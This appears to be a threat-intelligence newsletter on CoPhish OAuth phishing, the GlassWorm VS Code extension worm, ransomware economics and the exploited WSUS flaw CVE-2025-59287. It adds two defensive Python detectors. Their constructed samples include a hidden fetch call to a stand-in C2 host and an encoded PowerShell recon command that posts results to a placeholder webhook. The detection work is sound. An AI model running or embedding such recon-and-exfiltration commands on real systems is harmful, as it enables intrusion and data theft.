Malware Activity
Phishing via Microsoft Copilot and Self-Spreading Malware in Developer Tools
Cybersecurity researchers have uncovered two significant threats affecting users and developers. First, they identified a new phishing technique called 'CoPhish' that abuses Microsoft Copilot Studio agents to trick users into granting access through fake OAuth consent prompts. These malicious chatbot agents are served from legitimate Microsoft domains, which lends credibility to customized login buttons that redirect to attacker-controlled sites, steal OAuth tokens, hijack accounts and, in some cases, capture high-privilege admin roles. Although Microsoft plans to address the issue in future updates, the technique remains exploitable today. Second, a sophisticated malware strain named GlassWorm has been found infecting Visual Studio Code extensions distributed through popular marketplaces. This self-spreading worm uses the Solana blockchain and Google Calendar as command-and-control channels to resist detection and takedown. It hides malicious code behind invisible Unicode characters and targets widely used extensions, reaching thousands of downloads. Once inside, it can steal credentials, drain cryptocurrency wallets, and turn developer machines into infrastructure for further criminal activity, communicating over decentralized networks for resilience. These threats highlight the growing risks in cloud and developer environments and underscore the importance of strict security policies, cautious permission practices, and continuous monitoring against evolving attacks. CTIX analysts will continue to report on the latest malware strains and attack methodologies.
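The invisible-Unicode trick described above is easy to check for locally. The following scanner is an added example, not code from the original report or from any vendor: it walks a JavaScript file, reports every run of zero-width, bidirectional-control or variation-selector code points with its line and column, and decodes a variation-selector run back to bytes. The sample extension file is constructed for the illustration, and the byte mapping in encode_variation and decode_variation_run (U+FE00..U+FE0F for 0..15, U+E0100..U+E01EF for 16..255) is one published scheme for smuggling bytes in variation selectors; it is an assumption here, not GlassWorm's documented format.

```python
"""
Added example (not from the page or any vendor): find invisible Unicode code
points in JavaScript source, of the kind GlassWorm is reported to use to hide
a payload where the editor shows nothing. The sample file is constructed; the
variation-selector byte mapping is an assumed scheme, not GlassWorm's format.
"""

ZERO_WIDTH = {0x200B, 0x200C, 0x200D, 0x2060, 0xFEFF}
BIDI_CONTROLS = set(range(0x202A, 0x202F)) | set(range(0x2066, 0x206A))
VS_BASIC = range(0xFE00, 0xFE10)         # Variation Selectors block
VS_SUPPLEMENT = range(0xE0100, 0xE01F0)  # Variation Selectors Supplement


def classify(code_point):
    """Name the class of an invisible code point, or None if it is visible."""
    if code_point in ZERO_WIDTH:
        return "zero-width"
    if code_point in BIDI_CONTROLS:
        return "bidi-control"
    if code_point in VS_BASIC or code_point in VS_SUPPLEMENT:
        return "variation-selector"
    return None


def find_invisible_runs(source):
    """Return one dict per run of consecutive invisible code points in source."""
    runs = []
    source = source.removeprefix("\ufeff")  # a leading BOM is legitimate, skip it
    for line_no, line in enumerate(source.splitlines(), start=1):
        i = 0
        while i < len(line):
            if classify(ord(line[i])) is None:
                i += 1
                continue
            start = i
            while i < len(line) and classify(ord(line[i])) is not None:
                i += 1
            text = line[start:i]
            runs.append({
                "line": line_no,
                "col": start,
                "length": len(text),
                "kinds": sorted({classify(ord(c)) for c in text}),
                "text": text,
            })
    return runs


def encode_variation(data):
    """Encode bytes as variation selectors (assumed scheme; used to build the sample)."""
    return "".join(
        chr(0xFE00 + b) if b < 16 else chr(0xE0100 + b - 16) for b in data
    )


def decode_variation_run(text):
    """Inverse of encode_variation; raises ValueError on a non-selector character."""
    out = bytearray()
    for ch in text:
        cp = ord(ch)
        if cp in VS_BASIC:
            out.append(cp - 0xFE00)
        elif cp in VS_SUPPLEMENT:
            out.append(cp - 0xE0100 + 16)
        else:
            raise ValueError(f"U+{cp:04X} is not a variation selector")
    return bytes(out)


# Constructed sample: a harmless-looking module with a zero-width space on line 2
# and an inert payload hidden after the closing brace on line 3.
HIDDEN_PAYLOAD = b"fetch('http://c2.invalid/')"
SAMPLE_JS = (
    "// constructed sample extension file, not a real one\n"
    "const greeting = 'hello';\u200b\n"
    "module.exports = { greeting };" + encode_variation(HIDDEN_PAYLOAD) + "\n"
    "console.log(greeting);\n"
)

if __name__ == "__main__":
    for run in find_invisible_runs(SAMPLE_JS):
        print(f"line {run['line']} col {run['col']}: {run['length']} x {', '.join(run['kinds'])}")
        if run["kinds"] == ["variation-selector"]:
            print("  decoded:", decode_variation_run(run["text"]))
```

Point it at the extracted contents of a .vsix (the JavaScript under extension/) before installing; any run of variation selectors outside emoji or CJK text, and any zero-width or bidi control in code, deserves a manual look regardless of whether the assumed decoding yields readable bytes.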
- BleepingComputer: New CoPhish Attack Steals OAuth Tokens via Copilot Studio Agents
- TheHackerNews: Self-Spreading 'GlassWorm' Infects VS Code Extensions in Widespread Supply Chain Attack
Threat Actor Activity
Q3 Threat Actor Trends in The Cyber Extortion Economy
As 2025 draws to a close, the cyber extortion landscape has split into two main strategies: volume-driven Ransomware-as-a-Service (RaaS) campaigns aimed at mid-market companies, and costly, targeted intrusions aimed at large enterprises. The Akira RaaS group exemplifies the former, exploiting vulnerabilities to carry out a high volume of attacks with low ransom demands but a high payment rate. This model prioritizes attack volume over victim size and so preserves market share. Other groups concentrate on high-value targets, a costlier approach that yields lower payment rates. Large enterprises become victims mainly when an extortion campaign exploits widely used software or hardware, as seen in the activity of Cl0p and Scattered Spider. In Q3, ransomware groups pushed further into enterprise environments with targeted methods.

Insider threats are emerging: the Medusa ransomware gang attempted to bribe a BBC employee for network access. This marks a shift from the usual data-theft events to direct ransomware deployment through insider collaboration.

Ransomware economics have evolved from low-cost operations into more complex RaaS models that bundle data theft. As margins thin and trust between developers and affiliates erodes, some groups are abandoning encryption for data-theft-only extortion. That shift, together with falling payment rates, points to a contracting extortion economy. In Q3 2025 the average ransom payment dropped sharply, with large enterprises resisting pressure to pay, while mid-market attacks, though more frequent, produced smaller payments. The ransom payment rate fell to a record low of 23%, reflecting collective progress in defense. The common initial access vectors remain remote access compromise, phishing, and exploitation of software vulnerabilities. Exfiltration, lateral movement, and command-and-control tactics dominate the post-compromise phase, and discovery activity offers early detection opportunities.
Ransomware attacks remain opportunistic, exploiting accessible entry points rather than targeting specific industries. The median victim size rose to 362 employees, challenging the assumption that larger targets guarantee larger payouts. As the landscape evolves, organizations must strengthen insider threat programs and adapt to new extortion tactics. CTIX analysts remain committed to providing the latest updates on threat actor activity and emerging threats.
Vulnerabilities
Active Exploitation of Critical WSUS Remote Code Execution Vulnerability
A critical Windows Server Update Services (WSUS) remote code execution (RCE) vulnerability is under active exploitation following the public release of proof-of-concept code. The flaw, tracked as CVE-2025-59287 (CVSS 9.8/10), stems from unsafe deserialization of untrusted AuthorizationCookie objects through BinaryFormatter in a legacy serialization path, allowing unauthenticated attackers to execute arbitrary code as SYSTEM on Windows servers with the WSUS Server Role enabled. Microsoft first addressed the issue on Patch Tuesday but subsequently released out-of-band updates (including KB5070881 and KB5070887) to fully remediate it across all supported Windows Server versions; the out-of-band updates require a reboot to take effect. Successful exploitation lets attackers remotely execute PowerShell and cmd.exe commands, download and run Base64-encoded payloads, and enumerate host and domain information (whoami, net user /domain, ipconfig /all) before exfiltrating the results to attacker-controlled webhooks. Threat activity was first observed on October 23 and 24, 2025, by Eye Security, Huntress, and the Dutch National Cyber Security Centre (NCSC-NL), with more than 2,500 WSUS servers found publicly exposed, some in high-value environments. Given the vulnerability's wormable potential and active exploitation, organizations are strongly urged to apply Microsoft's out-of-band updates immediately or, where patching is not yet possible, to disable the WSUS Server Role and block inbound traffic on ports 8530 and 8531 (the default WSUS HTTP and HTTPS ports). Both workarounds also stop WSUS from serving updates to its clients, so treat them as temporary. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-59287 to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to remediate by November 14, 2025. CTIX analysts strongly urge administrators to ensure that all vulnerable systems are patched before that deadline.
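The post-exploitation chain above (WSUS spawning a shell, a Base64 -EncodedCommand payload, recon commands, a POST to a webhook) is what defenders can hunt for while patching is in progress. The following detector is an added example, not code from the page, Microsoft, or any of the named researchers. It runs over process-creation events; the event layout, the sample events and the parent-process names it keys on (wsusservice.exe and the IIS worker w3wp.exe that hosts the WSUS web services) are assumptions made for this illustration and should be mapped onto your Sysmon or EDR schema.

```python
"""
Added example (not the page's or any vendor's code): flag process-creation
events that match the CVE-2025-59287 post-exploitation pattern described above.
Event fields, parent process names and sample events are assumptions.
"""
import base64
import binascii
import re

WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}       # assumed WSUS-side parents
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
RECON_MARKERS = ("whoami", "net user", "net group", "ipconfig", "nltest", "systeminfo")
WEBHOOK_URL = re.compile(r"https?://\S*webhook\S*", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload (PowerShell uses UTF-16LE), or ''."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return ""


def analyze_event(event):
    """Return the list of indicators matched by one process-creation event."""
    findings = []
    if basename(event["parent_image"]) not in WSUS_PARENTS:
        return findings
    if basename(event["image"]) not in SHELLS:
        return findings
    findings.append("wsus-spawned-shell")
    decoded = decode_encoded_command(event["command_line"])
    if decoded:
        findings.append("encoded-powershell")
    text = (event["command_line"] + " " + decoded).lower()
    if any(marker in text for marker in RECON_MARKERS):
        findings.append("recon-commands")
    if WEBHOOK_URL.search(text):
        findings.append("webhook-exfil")
    return findings


def scan(events):
    """Return {index: findings} for every event that matched at least one indicator."""
    results = {}
    for index, event in enumerate(events):
        findings = analyze_event(event)
        if findings:
            results[index] = findings
    return results


# Constructed sample events (not real telemetry). The first mimics the chain in the
# report: WSUS -> cmd.exe -> powershell.exe with a Base64 payload that runs recon and
# POSTs the output to a webhook. The second is ordinary administrator activity.
_PAYLOAD = (
    "$o = (whoami) + (net user /domain) + (ipconfig /all); "
    "Invoke-WebRequest -Method POST -Uri https://webhook.example.invalid/collect -Body $o"
)
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {
        "parent_image": r"C:\Program Files\Update Services\Service\wsusservice.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": f"cmd.exe /c powershell.exe -nop -w hidden -enc {_ENCODED}",
    },
    {
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS).items():
        print(f"event {index}: {', '.join(findings)}")
```

The first indicator alone (a WSUS process spawning any shell) is worth an alert on a server that should only be serving updates; the remaining three add confidence and give the responder the decoded command to read. When the shell is one hop removed (powershell.exe whose parent is cmd.exe whose parent is wsusservice.exe), match on the grandparent or walk the process tree rather than relying on the direct parent field used here.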